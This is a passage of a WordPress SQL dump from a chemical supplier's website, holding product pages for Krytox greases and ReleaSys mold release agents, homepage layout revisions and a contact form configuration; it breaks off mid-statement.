INSERT INTO `wp_posts` VALUES (2230, 2, '2016-10-28 19:39:49', '2016-10-28 19:39:49', '<h1><strong>GPL 205 Product Information</strong></h1>\n<h4>Krytox GPL 205 grease are thickened with polytetrafluoroethylene (PTFE).</h4>\nThis special high efficiency thickener has a melting point of 325 °C (617 °F) and has low molecular weight and sub-micron (0.2 m) particle size for higher performance in bearings. Krytox GPL 205 grease is a white buttery grease with all of the same properties as the Krytox GPL 105 oil that it is are made from, but it is in a grease form.\n\nThe standard grease consistency is NLGI grade 2 penetration (265–295). Softer or harder NLGI penetration grades can be made by special order.\n\nKrytox GPL 205 is food grade NSF H-1 Rated for incidental food contact. To learn more about applications regarding food grade greases click on the link below. As with the full line of Krytox lubricants, Krytox oils and greases deliver superior performance with advanced features of high-temperature stability, nonflammability, and chemical and biological inertness. Krytox lubricants will not carbonize or form gummy deposits that typically cause failures, nor will they evaporate. Therefore, maintenance costs can be significantly reduced.\n\nSpecial nonmelting XHT grades are available for applications that are higher than the 325 °C (617 °F) melting point of the standard PTFE thickener.\n\n<a href="https://www.miller-stephenson.com/krytox-prepare-bearings/">Prepping a bearing for Krytox is a simple process. Click here to get a step by step guide on how to prep a bearing with Krytox grease.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">To learn more about Krytox NSF H-1 Rated Food Grade Lubricants click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">To learn more about Krytox Automotive Solutions click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-noise-vibration-harshness/">To learn more about Krytox Automotive Noise, Harshness and Vibration solutions click here. </a>\n\n<a href="https://www.miller-stephenson.com/krytox-faq/">For the Krytox Frequently asked questions (FAQ) click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-product-selection-guide/">With help regarding which Krytox grease is right for you, click here.</a>\n\n<a href="https://www.grainger.com/product/KRYTOX-White-PTFE-Multipurpose-Grease-35RU38">Krytox GPL 205 can also be found on Grainger.</a>\n\n&nbsp;', 'GPL 205', 'Krytox GPL 205 has a Oil Viscosity of 160 cSt at 40°C.\n\nEstimated useful temperature range is -36°C to 204°C.\n\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '789-autosave-v1', '', '', '2016-10-28 19:39:49', '2016-10-28 19:39:49', '', 789, 'https://www.miller-stephenson.com/789-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2231, 3, '2016-10-03 19:04:28', '2016-10-03 19:04:28', '', 'Urethane mold release agent', '', 'inherit', 'closed', 'closed', '', 'shutterstock_106416161', '', '', '2016-11-23 13:21:57', '2016-11-23 13:21:57', '', 310, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_106416161.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2232, 1, '2016-10-03 19:04:50', '2016-10-03 19:04:50', '<label> Your Name (required)\n    [text* your-name] </label>\n\n<label> Your Email (required)\n    [email* your-email] </label>\n\n<label> Subject\n    [text your-subject] </label>\n\n<label> Your Message\n    [textarea your-message] </label>\n\n[submit "Send"]\nMiller-Stephenson Chemicals "[your-subject]"\n[your-name] <wordpress@104.238.94.202>\nFrom: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Miller-Stephenson Chemicals (https://www.miller-stephenson.com)\nddillulio@mschem.com\nReply-To: [your-email]\n\n0\n0\n\nMiller-Stephenson Chemicals "[your-subject]"\nMiller-Stephenson Chemicals <wordpress@104.238.94.202>\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Miller-Stephenson Chemicals (https://www.miller-stephenson.com)\n[your-email]\nReply-To: ddillulio@mschem.com\n\n0\n0\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.', 'Contact form 1', '', 'publish', 'closed', 'closed', '', 'contact-form-1', '', '', '2016-10-03 19:04:50', '2016-10-03 19:04:50', '', 0, 'https://www.miller-stephenson.com/?post_type=wpcf7_contact_form&p=2232', 0, 'wpcf7_contact_form', '', 0); 
INSERT INTO `wp_posts` VALUES (2234, 0, '2016-10-03 19:16:17', '2016-10-03 19:16:17', '', '', '', 'publish', 'closed', 'closed', '', '2234', '', '', '2016-10-03 19:16:18', '2016-10-03 19:16:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/2234/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2236, 0, '2016-10-03 19:24:58', '2016-10-03 19:24:58', '', '', '', 'publish', 'closed', 'closed', '', '2236', '', '', '2016-10-03 19:24:59', '2016-10-03 19:24:59', '', 0, 'https://www.miller-stephenson.com/nf_sub/2236/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2237, 3, '2017-06-05 12:06:25', '2017-06-05 12:06:25', '<h2>ReleaSys 82 | Water-based PTFE Release Agent</h2>\n<h3>Advanced Fluoropolymer Chemistry; Exceptional</h3>\nReleaSys 82 is an aerosolized water-based, semi-permanent dry film release agent designed to provide reliable, consistent release across a broad range of moldable substrates.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal mold build-up.  ReleaSys 82 water-based PTFE release agent will not interfere with post-production finishing operation and is ideal for Rubber to Metal Bonding operations. Benefits of this product include:\n<ul>\n 	<li>High durability; Surface activation chemistry</li>\n 	<li>Ideal for lower complexity molds</li>\n 	<li>Ideal for Rubber to Metal Bonding</li>\n 	<li>Improves quality and consistency of molded parts</li>\n</ul>\nSemi-permanent release agents are state-of-the-art release systems that provide the molding industry with an alternative to the traditional high volume, apply-every-cycle release agent. Miller-Stephenson has developed the ReleaSys product line in an effort to offer a high efficiency, cost-effective, and technologically advanced release agent to our customers. Our semi-permanent release agents forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression). Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites, elastomers and organic polymers.\n\nThe application efficiency of ReleaSys can be seen by the relatively small amounts of Dry Film Release Agent that needs to be applied to the mold surface to give numerous releases.  This small volume needed means that storage space is reduced and cost per application is minimized. ReleaSys 82 Water-based PTFE Release Agent is formulated ready-to-use, making dilution equipment redundant. Overall, our mold release agents represent an added-value proposition that can be tailored to many types of molding applications. Miller-Stephenson has spend years improving and tailoring our mold release agents to deliver the highest value proposition by increase efficiency, reducing over-application, and enhancing finished part quality and consistency.\n\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For help with application or troubleshooting concerns while using ReleaSys.</strong></a>\n\n<strong><a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a></strong>', 'ReleaSys 82 | Water-based PTFE Release Agent', 'ReleaSys 82 is an aerosolized water-based, semi-permanent dry film mold release agent designed to provide reliable, consistent release across a broad range of moldable substrates.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal mold build-up.  ReleaSys 82 will not interfere with post-production finishing operation. Benefits of this product include:\n<ul>\n 	<li>High durability; Surface activation chemistry</li>\n 	<li>Ideal for lower complexity molds</li>\n 	<li>Ideal for Rubber to Metal Bonding</li>\n 	<li>Improves quality and consistency of molded parts</li>\n</ul>', 'inherit', 'closed', 'closed', '', '400-autosave-v1', '', '', '2017-06-05 12:06:25', '2017-06-05 12:06:25', '', 400, 'https://www.miller-stephenson.com/400-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2238, 30, '2016-10-03 19:59:44', '2016-10-03 19:59:44', '', '', '', 'publish', 'closed', 'closed', '', '2238', '', '', '2016-10-03 19:59:44', '2016-10-03 19:59:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/2238/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2239, 30, '2016-10-03 20:02:29', '2016-10-03 20:02:29', '', '', '', 'publish', 'closed', 'closed', '', '2239', '', '', '2016-10-03 20:02:29', '2016-10-03 20:02:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/2239/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2240, 31, '2016-10-03 20:54:01', '2016-10-03 20:54:01', '', '', '', 'publish', 'closed', 'closed', '', '2240', '', '', '2016-10-03 20:54:01', '2016-10-03 20:54:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/2240/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2241, 32, '2016-10-03 21:13:02', '2016-10-03 21:13:02', '', '', '', 'publish', 'closed', 'closed', '', '2241', '', '', '2016-10-03 21:13:02', '2016-10-03 21:13:02', '', 0, 'https://www.miller-stephenson.com/nf_sub/2241/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2242, 0, '2016-10-04 11:41:25', '2016-10-04 11:41:25', '', '', '', 'publish', 'closed', 'closed', '', '2242', '', '', '2016-10-04 11:41:25', '2016-10-04 11:41:25', '', 0, 'https://www.miller-stephenson.com/nf_sub/2242/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2243, 2, '2016-10-04 12:33:47', '2016-10-04 12:33:47', '', 'fluoroguard', '', 'inherit', 'closed', 'closed', '', 'fluoroguard', '', '', '2016-10-04 12:33:47', '2016-10-04 12:33:47', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/Fluoroguard.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2244, 2, '2016-10-04 12:34:26', '2016-10-04 12:34:26', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-10-04 12:34:26', '2016-10-04 12:34:26', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2245, 2, '2016-10-04 13:12:41', '2016-10-04 13:12:41', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n\r\n[/text_box]\r\n[text_box]\r\n\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n\r\n[/text_box]\r\n[text_box position_y="20"]\r\n\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n\r\n<h3>Technical Support</h3>\r\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n<h3>Application Experts</h3>\r\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n<h3>Large Inventory</h3>\r\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n<h3>Low Global Warming</h3>\r\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-10-04 13:12:41', '2016-10-04 13:12:41', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2246, 2, '2017-02-07 15:59:18', '2017-02-07 15:59:18', 'Krytox GPL 206 are greases are based on perfluoropolyether (PFPE) oils. This series of synthetic fluorinated lubricants are used in extreme conditions such as continuous high temperatures up to 260°C (500°F) and will survive short term peak temperatures of up to 270°C (518°F). Chemically inert and safe for use around most chemicals, these lubricants are nonflammable and are also safe for use in oxygen service.\n\nKrytox GPL 206 grease does not damage plastics or elastomers nor cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial and semiconductor applications as well as in solving many other routine lubrication problems. In addition, they provide exceptionally long lifetimes in sealed-for-life bearings and extend relubrication intervals in bearings that require relubrication.\n\nThe Krytox GPL 206 grease is PTFE thickened, contains no additives and can be used on components that come in contact with chemicals. Typical applications include valves, instruments or bearings in contact with chemicals including alcohols, ammonia, solvents, steam, acids and bases, and oxygen systems including LOX and GOX. They are commonly used as seal and o-ring lubricants and are compatible with all types of seals.\n\nNew components often have organic rust preventive oils or greases on them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The components must be completely cleaned of greases or preservative oils when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on un-cleaned bearings have shown reduced life in high temperature, high speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They could also oxidize and harden and can create debris which will contaminate the grease.\n\n<a href="https://www.miller-stephenson.com/krytox-prepare-bearings/">Prepping a bearing for Krytox is a simple process. Click here to get a step by step guide on how to prep a bearing with Krytox grease.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">To learn more about Krytox NSF H-1 Rated Food Grade Lubricants click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">To learn more about Krytox Automotive Solutions click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-noise-vibration-harshness/">To learn more about Krytox Automotive Noise, Harshness and Vibration solutions click here. </a>\n\n<a href="https://www.miller-stephenson.com/krytox-faq/">For the Krytox Frequently asked questions (FAQ) click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox/">For a general Krytox application overview, click here.</a>\n\n<a href="https://www.miller-stephenson.com/krytox-product-selection-guide/">With help regarding which Krytox grease is right for you, click here.</a>', 'GPL 206', 'Krytox GPL 206 has a Oil Viscosity of 243 cSt at 40°C.\n<br /><br />\nEstimated useful temperature range is -36°C to 260°C.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '790-autosave-v1', '', '', '2017-02-07 15:59:18', '2017-02-07 15:59:18', '', 790, 'https://www.miller-stephenson.com/790-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2247, 0, '2016-10-04 13:54:35', '2016-10-04 13:54:35', '', '', '', 'publish', 'closed', 'closed', '', '2247', '', '', '2016-10-04 13:54:35', '2016-10-04 13:54:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/2247/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2248, 3, '2016-10-04 13:58:05', '2016-10-04 13:58:05', '[row]\r\n\r\n[col span="6"]\r\n\r\n[ux_banner height="600px" bg="523" link="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent/"]\r\n\r\n[text_box width="45" width__sm="60" scale="123" animate="fadeIn" position_x="100" position_y="20" text_align="left"]\r\n\r\n[title style="center" text="Semi-Permanent Mold Release" size="88"]\r\n<h1><strong>ReleaSys</strong></h1>\r\n<strong><em>Miller-Stephenson Exclusive Product</em></strong><a class="button alt-button white" title="" href="../chemicals/release-agents/semi-permanent/">ReleaSys Product Line</a>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="6"]\r\n<h3>ReleaSys Semi-Permanent Mold Release</h3>\r\nMiller-Stephenson\'s exclusive mold release system, ReleaSys Release Agent is backed by more than 40 years of research and development experience.  ReleaSys was developed to be the most technological advanced release agent system on the market, capable of releasing the most complex materials in the most demanding molding operations.  Miller-Stephenson has developed ReleaSys formulations to be applicable in virtually all types of composites and rubber molding process. Customers who implement ReleaSys into their molding operations can expect the following benefits:\r\n<ul>\r\n 	<li>Cost-Effective, Efficient Release</li>\r\n 	<li>Lower rejection rates and Higher quality parts</li>\r\n 	<li>Superior Durability and Surface Adhesion</li>\r\n 	<li>Low Levels of Mold Fouling</li>\r\n 	<li>Minimized transfer</li>\r\n</ul>\r\n[button text="Download ReleaSys Product Guide" style="primary" link="../wp-content/uploads/2016/08/ReleaSys-Product-Guide.pdf"]\r\n\r\n[/col]\r\n\r\n[/row]', 'ReleaSys Introduction', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-10-04 13:58:05', '2016-10-04 13:58:05', '', 455, 'https://www.miller-stephenson.com/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2249, 2, '2016-10-04 14:10:59', '2016-10-04 14:10:59', 'Krytox GPL 217 heavy-duty grease is used for high loading or slow speeds. EP greases have high load-carrying capability and good lubrication characteristics under boundary and mixed friction conditions. In addition to the EP additive in Krytox GPL 217 heavy-duty grease, Krytox oil provides adequate EP protection as an oil by itself, due to the viscosity build under load and its unique tribochemistry. \n\nA common test for analyzing EP performance is the Timken EP method, ASTM D2509. The test is performed by applying pressure between a rotating steel cup and a steel block and simulates line contact conditions. Two conditions are observed; the OK Load is the highest load at which no seizing or welding occurs, and it also reflects the load-carrying capability of the lubricant. The\nScore Load is the lowest load at which seizing or welding is observed. The scar width, which is the average scar width at the load corresponding to the OK load valve, is also recorded. \n\nAnother common test for analyzing EP performance is the Four Ball EP, ASTM D2596. The test is performed by steadily increasing the load on a rotating steel ball in contact with three fixed balls until they seize and welding occurs, which simulates point contact conditions. The lowest load at which this welding occurs is called the Weld Point. From this data, the load wear index (LWI) is calculated, which is a value that relates how well the grease prevents wear when operating below the weld point. For many competing greases, the LWI can generally fall between 50 and 100. Krytox greases typically have an LWI well above 100. This further shows how in addition to extreme condition performance, Krytox™ can also outperform most competitive greases in extreme pressure performance\n\nOne of the greatest advantages of using Krytox lubricants is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\n', 'GPL 217', 'Krytox GPL 217 has a Oil Viscosity of 450 cSt at 40°C.\n<br /><br />\nEstimated useful temperature range is -30°C to 288°C.\n<br /><br />\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '824-autosave-v1', '', '', '2016-10-04 14:10:59', '2016-10-04 14:10:59', '', 824, 'https://www.miller-stephenson.com/824-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2250, 2, '2016-10-04 14:31:17', '2016-10-04 14:31:17', 'The Krytox GPL 220 grease contains an anti-corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings. Krytox oils and greases are silicone free. They do not contain any VOC materials or chlorine and are not hazardous to the atmosphere or ozone layer. They are biologically and environmentally inert.\n\nThe fully fluorinated Krytox GPL 220 high-temperature stability provides bottom-line savings from improved reliability and a reduction in grease usage and manpower through extended relubrication intervals. Excellent film strength reduces wear to reduce maintenance costs. Under high loads the viscosity increases to provide support and absorb the pressure.\n\nNew components often have organic rust preventive oils or greases on them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. 